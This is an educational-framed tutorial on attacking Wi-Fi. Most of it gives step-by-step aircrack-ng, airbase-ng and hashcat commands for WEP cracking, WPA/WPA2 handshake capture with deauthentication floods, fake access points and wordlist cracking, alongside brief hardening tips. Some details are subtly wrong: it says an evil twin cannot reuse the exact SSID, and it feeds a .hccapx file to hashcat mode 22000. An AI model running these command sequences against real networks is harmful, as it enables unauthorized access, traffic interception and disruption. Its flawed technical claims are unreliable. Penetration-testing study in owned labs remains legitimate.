A Beginner's Guide to Wi-Fi Attacks

Understand the Basics of Wi-Fi and How to Attack WIFI

Wireless networks are ubiquitous, connecting our devices to the internet seamlessly. However, this convenience comes with vulnerabilities that attackers can exploit. In this guide, we delve into Wi-Fi attacks, focusing on theoretical knowledge and practical steps for beginners. This is for educational purposes and aims to foster awareness about securing wireless networks.

What is Wi-Fi

The importance of the Internet in our lives is universally acknowledged without the need for any justification. Wi-Fi is the technology that connects our devices to the global network, the Internet. This seamless connection to the Internet appears to be wireless from our devices, which is true to some extent. Our devices are connected wirelessly to the router, which acts as a bridge between us and the Internet, and the router is connected to the Internet via a wired connection.

To connect to Wi-Fi, we turn it on from our devices, and it lists all the available Wi-Fi networks around us. This list comprises the access points (often the routers) that are broadcasting Wi-Fi signals with a unique SSID (network name). You can connect to any of these if you know the correct password, also known as a pre-shared key (PSK). Once you successfully connect to a network via Wi-Fi, you will be assigned an IP address inside that network, which will uniquely identify you and help you communicate with other devices. It is just like becoming a member of a family assigned with a name that the whole family trusts.

Wi-Fi's Pivotal Role in Organisations

Most organisations rely on the Internet for their business functioning. Using a wired connection for all employees to connect to the Internet raises concerns about cost, efficiency, and flexibility at work. So, organisations use Wi-Fi for their networks to connect their employees to the Internet. As the employees connect to the organisation's network, they form a family of interconnected devices. The devices inside the network can communicate with each other and request or respond to any request. Organisations tend to recruit trustworthy and professional employees to avoid any misuse of their privileges inside the network.

However, a malicious actor from outside the organisation could still see the broadcasted Wi-Fi SSID of the organisation's network when they turn their Wi-Fi on. This may not seem to be a problem as the attacker does not know the password, but the attacker actually has some other plans as well!

Attacks on Wi-Fi

There are several techniques attackers use to exploit Wi-Fi technology. The techniques discussed here are solely for educational purposes. Unauthorised attempts to access or compromise networks are illegal and may lead to severe legal consequences. With that in mind, here are some of the most popular techniques:

Evil Twin Attack

In this attack, the attacker creates a fake access point that has a similar name to one of your trusted Wi-Fi access points. Of course, it cannot be the exact same. If the trusted Wi-Fi's name is "Home_Internet", the attacker creates a fake Wi-Fi access point named "Home_Internnet" or something similar that is difficult to differentiate. The attack starts with the attacker sending de-authentication packets to all the users connected to their legitimate Wi-Fi access points. The users would face repeated disconnections from the network after this. With frustration, the users are likely to open the Wi-Fi access points list for troubleshooting and will find the attacker's Wi-Fi with almost similar name and with greater signal strength. They would go to connect it, and once connected, the attacker could see all their traffic to or from the Internet.

Rogue Access Point

This attack's objective is similar to that of the evil twin attack. In this attack, the attacker sets up an open Wi-Fi access point near or inside the organisation's physical premises to make it available to users with good signal strength. The users inside the organisation may accidentally join this network if their devices are set to connect automatically to open Wi-Fi. The attacker can intercept all their communication after the users connect to this rogue access point.

WPS Attack

Wi-Fi Protected Setup (WPS) was created to allow users to connect to their Wi-Fi using an 8-digit PIN without remembering complex passwords. However, this 8-digit PIN is vulnerable in some networks due to its insecure configuration. The attack is made by initiating a WPS handshake with the router and capturing the router's response, which contains some data related to the PIN and is vulnerable to brute-force attacks. Some of the captured data is brute-forced, and the PIN is successfully extracted along with the Pre-Shared Key (PSK).

WPA/WPA2 Cracking

Wi-Fi Protected Access (WPA) was created to secure wireless communication. It uses a strong encryption algorithm. However, the security of this protocol is heavily influenced by the length and complexity of the Pre-Shared Key (PSK). While cracking WPA, attackers start by sending de-authentication packets to a legitimate user of the Wi-Fi network. Once the user disconnects, they try to reconnect to the network, and a 4-way handshake with the router takes place during this time. Meanwhile, the attacker turns its adaptor into monitor mode and captures the handshake. After the handshake is captured, the attacker can crack the password by using brute-force or dictionary attacks on the captured handshake file.

WPA/WPA2 Cracking In Detail

As mentioned above, WPA/WPA2 cracking begins by listening to Wi-Fi traffic to capture the 4-way handshake between a device and the access point. Since waiting for a device to connect or reconnect can take some time, deauthentication packets are sent to disconnect a client, forcing it to reconnect and initiate a new handshake, which is captured. After the handshake is captured, the attacker can crack the password (PSK) by using brute-force or dictionary attacks on the captured handshake file.

The 4-way Handshake

The WPA password cracking process involves capturing a Wi-Fi network's handshake to attempt a PSK (password) decryption. First, an attacker places their wireless adapter into monitor mode to scan for networks, then targets a specific network to capture the 4-way handshake. Once the handshake is captured, the attacker runs a brute-force or dictionary attack using a tool like aircrack-ng to attempt to match a wordlist against the passphrase.

The WPA 4-way handshake is a process that helps a client device (like your phone or laptop) and a Wi-Fi router confirm they both have the right "password" or Pre-Shared Key (PSK) before securely connecting. Here's a simplified rundown of what happens:

1. Router sends a challenge: The router (or access point) sends a "challenge" to the client, asking it to prove it knows the network's password without directly sharing it.
2. Client responds with encrypted information: The client takes this challenge and uses the PSK to create an encrypted response that only the router can verify if it also has the correct PSK.
3. Router verifies and sends confirmation: If the router sees the client's response matches what it expects, it knows the client has the right PSK. The router then sends its own confirmation back to the client.
4. Final check and connection established: The client verifies the router's response, and if everything matches, they finish setting up the secure connection.

💡 This handshake doesn't directly reveal the PSK itself but involves encrypted exchanges that depend on the PSK.

Understanding Wi-Fi Security Protocols

Before diving into attacks, it's crucial to understand the protocols that secure Wi-Fi networks:

1. WEP (Wired Equivalent Privacy):

• Introduced in 1997, WEP was an early attempt at securing wireless networks.
• Uses RC4 encryption but is weak due to short initialization vectors (IVs).

2. WPA (Wi-Fi Protected Access):

• Replaced WEP and introduced stronger encryption via TKIP.
• Vulnerable to dictionary attacks on pre-shared keys.

3. WPA2:

• Implements AES encryption and is more secure than WPA.
• Vulnerable to KRACK (Key Reinstallation Attacks) and brute-force attacks.

4. WPA3:

• The latest standard with stronger encryption and forward secrecy.
• Not entirely immune to attacks like Dragonblood.

Setting Up a Lab for Wi-Fi Penetration Testing

To safely practice Wi-Fi attacks, set up a controlled lab environment:

1. Hardware Requirements:

• Wireless network adapter that supports monitor mode and packet injection.
• A test router with WEP/WPA/WPA2 configurations.
• A secondary device for connecting to the test network.

2. Software Requirements:

• Kali Linux: Pre-installed tools for Wi-Fi penetration testing.
• Aircrack-ng Suite: Essential for capturing and cracking Wi-Fi keys.
• Wireshark: For analyzing packets.

3. Environment:

• Isolate your lab network to avoid legal or ethical violations.
• Use a test network under your control.

Practical Wi-Fi Attack Techniques

1. WEP Cracking

Objective: Exploit weak IVs in WEP encryption to recover the network key.

Tools: Aircrack-ng suite.

Steps:

Step 1 — Start Monitor Mode:

airmon-ng start wlan0

Replace wlan0 with your wireless adapter's name.

Step 2 — Capture Packets:

airodump-ng wlan0mon

Note the target network's BSSID and channel.

Step 3 — Target the Network:

airodump-ng --bssid <BSSID> --channel <CH> -w output wlan0mon

Replace <BSSID> and <CH> with the target's BSSID and channel.

Step 4 — Inject Packets:

aireplay-ng --arpreplay -b <BSSID> wlan0mon

This increases the number of IVs captured.

Step 5 — Crack the Key:

aircrack-ng -b <BSSID> output*.cap

2. WPA/WPA2 Handshake Capture and Brute-Force

Objective: Capture the 4-way handshake and use brute-force or dictionary attacks.

Steps:

Step 1 — Enable Monitor Mode:

airmon-ng start wlan0

Step 2 — Capture Handshake:

airodump-ng --bssid <BSSID> --channel <CH> -w handshake wlan0mon

Step 3 — Deauthenticate a Client (to force handshake):

aireplay-ng --deauth 10 -a <BSSID> -c <CLIENT_MAC> wlan0mon

Replace <CLIENT_MAC> with the MAC address of a connected device.

Step 4 — Crack the Handshake:

aircrack-ng -w /path/to/wordlist.txt -b <BSSID> handshake*.cap

3. Deauthentication Attack

Objective: Disconnect clients from the network.

Tool: aireplay-ng

Steps:

Step 1 — Identify the client and access point (AP):

airodump-ng wlan0mon

Step 2 — Send deauth packets:

aireplay-ng --deauth 0 -a <BSSID> wlan0mon

⚠️ Using 0 means sending unlimited deauth packets. Use responsibly in a controlled environment only.

4. Evil Twin Attack

Objective: Create a rogue AP to trick users into connecting.

Tools: airbase-ng, Wireshark

Steps:

Step 1 — Set Up Fake AP:

airbase-ng -e "Fake_AP" wlan0mon

Step 2 — Enable Internet Sharing (optional): Configure IP forwarding and NAT to provide internet access.

Step 3 — Monitor Traffic: Use Wireshark or tcpdump to analyze captured packets.

5. KRACK Attack

Objective: Exploit weaknesses in WPA2's 4-way handshake to decrypt traffic.

Tool: Custom scripts or pre-built tools available in Kali Linux.

📝 The KRACK (Key Reinstallation Attack) targets the third step of the WPA2 4-way handshake. By manipulating and replaying cryptographic handshake messages, the attacker can force nonce reuse, which breaks the encryption.

Best Practices to Secure Wi-Fi Networks

Securing your Wi-Fi network is essential to prevent unauthorized access. Follow these best practices:

1. Upgrade Protocols: Avoid WEP and WPA; use WPA2 or WPA3.
2. Strong Passwords: Use long, complex passwords to prevent brute-force attacks.
3. Firmware Updates: Regularly update router firmware to patch vulnerabilities.
4. MAC Address Filtering: Restrict network access to known devices.
5. Network Segmentation: Separate guest networks from internal ones.
6. Disable WPS (Wi-Fi Protected Setup): Prevent PIN-based attacks.

🎬 Video Walkthrough: 3 Levels of WiFi Hacking

The following steps and commands are demonstrated in the video tutorial below. This walkthrough covers how to capture a WPA/WPA2 handshake and attempt to crack the password using the Aircrack-ng suite on Kali Linux.

⚠️ Important: Only perform these steps on networks you own or have explicit written permission to test. Unauthorized access is illegal.

Step 1 — Identify Your Wireless Interface

Open a terminal and check your network interfaces:

ip a

Look for interfaces starting with wlan (e.g., wlan0). This is your wireless adapter.

Step 2 — Kill Conflicting Processes

Before enabling monitor mode, kill any processes that might interfere:

airmon-ng check kill

This stops NetworkManager and other services that could conflict with monitor mode.

Step 3 — Enable Monitor Mode

Switch your wireless adapter into monitor mode — this allows it to capture all nearby Wi-Fi traffic:

airmon-ng start wlan0

Your interface will now be renamed to something like wlan0mon. You can verify with:

ip a

💡 Monitor mode will temporarily break your internet connection. This is normal.

Step 4 — Scan for Nearby Wi-Fi Networks

Use airodump-ng to discover all nearby Wi-Fi networks:

airodump-ng wlan0mon

This will display a list of networks with important details:

• BSSID — The MAC address of the router
• CH — The channel the network is broadcasting on
• ESSID — The network name (SSID)
• ENC — The encryption type (WPA2, WPA, WEP)

Press Ctrl+C to stop scanning once you've identified your target network. Note down the BSSID and Channel.

Step 5 — Capture the 4-Way Handshake

Now target the specific network and start capturing packets, waiting for a handshake:

airodump-ng -d <TARGET_BSSID> -c <CHANNEL> -w <OUTPUT_FILENAME> wlan0mon

Example:

airodump-ng -d AA:BB:CC:DD:EE:FF -c 6 -w capture wlan0mon

• -d — Filter by the target BSSID (router MAC address)
• -c — Lock to the target channel
• -w — Output filename prefix (creates capture-01.cap, etc.)

Keep this terminal running. You need to wait for a device to connect/reconnect to capture the handshake.

Step 6 — Force a Handshake with Deauthentication Attack

If no handshake is being captured, you can speed things up by forcing devices to disconnect and reconnect. Open a new terminal and run:

Deauthenticate all devices from the router:

aireplay-ng -0 10 -a <ROUTER_BSSID> wlan0mon

Deauthenticate a specific client:

aireplay-ng -0 10 -a <ROUTER_BSSID> -c <CLIENT_BSSID> wlan0mon

Example:

aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF wlan0mon

• -0 — Deauthentication attack mode
• 10 — Number of deauth packets to send (use a small number to avoid disruption)
• -a — Target router BSSID
• -c — (Optional) Specific client MAC address

After sending deauth packets, go back to your first terminal. You should see "WPA handshake: AA:BB:CC:DD:EE:FF" appear in the top-right corner. Once captured, press Ctrl+C to stop.

Step 7 — Crack the Password with Aircrack-ng

Now use aircrack-ng to attempt cracking the captured handshake with a wordlist:

aircrack-ng -w <PATH_TO_WORDLIST> <CAPTURE_FILE>

Example using the popular rockyou.txt wordlist:

aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap

💡 The rockyou.txt or rockyou2024.txt wordlist comes pre-installed on Kali Linux and contains over 14 million common passwords. If the target password is in the wordlist, aircrack-ng will find it.

If successful, aircrack-ng will display: "KEY FOUND! [ password_here ]"

Step 8 — (Advanced) Crack with Hashcat for GPU Acceleration

For faster cracking, convert the .cap file and use Hashcat with GPU power:

Convert the capture file:

cap2hccapx capture-01.cap capture.hccapx

Run Hashcat:

hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt

• -m 22000 — Hash mode for WPA/WPA2
• Hashcat uses your GPU which is significantly faster than CPU-based cracking

Step 9 — Stop Monitor Mode

When you're done, restore your normal network connectivity:

airmon-ng stop wlan0mon

Then restart NetworkManager to reconnect to the internet:

systemctl start NetworkManager

Quick Command Reference

| Step | Command | |------|---------| | Check interfaces | ip a | | Kill conflicts | airmon-ng check kill | | Start monitor mode | airmon-ng start wlan0 | | Scan networks | airodump-ng wlan0mon | | Capture handshake | airodump-ng -d <BSSID> -c <CH> -w output wlan0mon | | Deauth attack | aireplay-ng -0 10 -a <BSSID> wlan0mon | | Crack with aircrack | aircrack-ng -w /usr/share/wordlists/rockyou.txt output-01.cap | | Crack with hashcat | hashcat -m 22000 capture.hccapx wordlist.txt | | Stop monitor mode | airmon-ng stop wlan0mon | | Restart networking | systemctl start NetworkManager |

Watch the Full Video Tutorial:

Conclusion

Wi-Fi security is a critical aspect of cybersecurity. Understanding how attacks work helps in building stronger defenses. Always practice ethical hacking in controlled environments and never attempt unauthorized access to any network.

⚠️ Disclaimer: This guide is for educational purposes only. Unauthorized attempts to access or compromise networks are illegal and may lead to severe legal consequences.

Happy Ethical Hacking! 🚀